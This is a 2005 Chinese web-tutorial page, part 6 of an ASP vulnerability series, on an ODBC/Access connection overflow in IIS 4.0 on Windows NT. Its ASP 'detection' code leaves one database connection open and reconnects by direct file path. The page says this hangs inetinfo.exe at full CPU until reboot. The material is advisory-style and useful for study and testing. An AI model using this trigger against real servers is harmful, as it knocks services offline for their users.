频道直达 - 学院 - 下载 - 交易 - 特效 - 字库 - 手册 -排名-工具- 繁體
网页教学网站开发 设为首页
加入收藏
联系我们
建站搜索: 常用广告代码   用户注册 | 用户登陆
您当前的位置:中国建站之家 -> 网站开发设计技术教程 -> asp教程 -> ASP漏洞分析和解决方法(6)

ASP漏洞分析和解决方法(6)

作者:未知  来源:转载  发布时间:2005-7-27 16:22:14  发布人:acx

减小字体 增大字体


18、MS ODBC数据库连接溢出导致NT/9x拒绝服务攻击

  漏 洞 描 述:
  Microsoft ODBC数据库在连接和断开时可能存在潜在的溢出问题(Microsoft ACCESS数据库相关)。
如果不取消连接而直接和第二个数据库相连接,可能导致服务停止。

  影响系统:
ODBC 版本: 3.510.3711.0
ODBC Access驱动版本: 3.51.1029.00
OS 版本: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386)
Microsoft Office 97 Professional (MSO97.dll: 8.0.0.3507)

  漏洞检测方法如下:
ODBC 连接源名称: miscdb
ODBC 数据库型号: MS Access
ODBC 假设路径: d:\data\misc.mdb

ASP代码如下:

<%
set connVB = server.createobject("ADODB.Connection")
connVB.open "DRIVER={Microsoft Access Driver (*.mdb)}; DSN=miscdb"

%>

<html>
<body>
...lots of html removed...
<!-- We Connect to DB1 -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DSN=miscdb;User=sa"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)
While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
'rsGlobal.close
'set rsGlobal = nothing
'connGlobal.close
'set connGlobal = nothing
' Note we do NOT close the connection
%>

<!-- Call the same database by means of DBQ direct file access -->
<%
set connGlobal = server.createobject("ADODB.Connection")
connGlobal.Open "DRIVER={Microsoft Access Driver (*.mdb)};
DBQ=d:\data\misc.mdb"
mSQL = "arb SQL Statement"
set rsGlobal = connGlobal.execute(mSQL)

While not rsGlobal.eof
Response.Write rsGlobal("resultfrommiscdb")
rsGlobal.movenext
wend
rsGlobal.close
set rsGlobal = nothing
connGlobal.close
set connGlobal = nothing
' Note we DO close the connection
%>

  在这种情况下,IIS处理进程将会停顿,CPU使用率由于inetinfo.exe进程将达到100%。只有重新启动计算机才能恢复。  


原作者:不详
来 源:不详



将本文收藏到QQ书签与更多好友分享
[打 印]
[] [返回上一页] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
精彩推荐
热门文章
· 注册码大全二
· 注册码大全四
· 注册码大全一
· 要10G免费网络硬盘的请进..
· 通过google 赶快来赚美金..
· 注册码大全十
· 头像-qq头像(qq新头像)4..
· 让你轻松架设FTP服务器1..
· 注册码大全三
· 梦幻背景图片7
· 卡通动物图片6
· 网页制作素材-按钮素材2..
· 让你轻松架设FTP服务器5..
· 风景图片8
· 注册码大全九
· 让你轻松架设FTP服务器2..
关注此文读者还看过
· ASP与JSP的比较
· 实 现 滚 动 新 闻
· [国外]100m/1g/php/mysq..
· 结合 PHP 使用 HTML 表单..
· 使用函数传递参数来执行..
· Global.asa 参考(三) - ..
· 精彩网页九“慎”
· JSP语法(1)
· 鼠绘技法--蜻蜓(1)
· ASP.Net写的浏览器间谍
· Adobe CS2新丁Bridge新鲜..
· 动画美术设计
· MySQL用于PHP的库, 对数..
· 3D教程:主持凳制作的简..
· 开发一个调试JSP的Eclip..
· 功能表列
相关文章
· ASP漏洞分析和解决方法(10)..
· ASP漏洞分析和解决方法(9)
· ASP漏洞分析和解决方法(8)
· ASP漏洞分析和解决方法(7)
· ASP漏洞分析和解决方法(6)
· ASP漏洞分析和解决方法(5)
· ASP漏洞分析和解决方法(4)
· ASP漏洞分析和解决方法(3)
· ASP漏洞分析和解决方法(2)
· ASP漏洞分析和解决方法(1)
· ASP基础教程:堵住ASP漏洞
· 3D教程:主持凳制作的..
· ASP漏洞全接触(2)
· ASP漏洞全接触(1)
· ASP漏洞分析和解决方法(2) ..
· ASP漏洞分析和解决方法(3) ..
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 人才招聘
网站合作、内容监督、商务咨询:QQ: 9576619
Copyright ? 2005--2008 中国建站之家版权所有
粤ICP备05092265号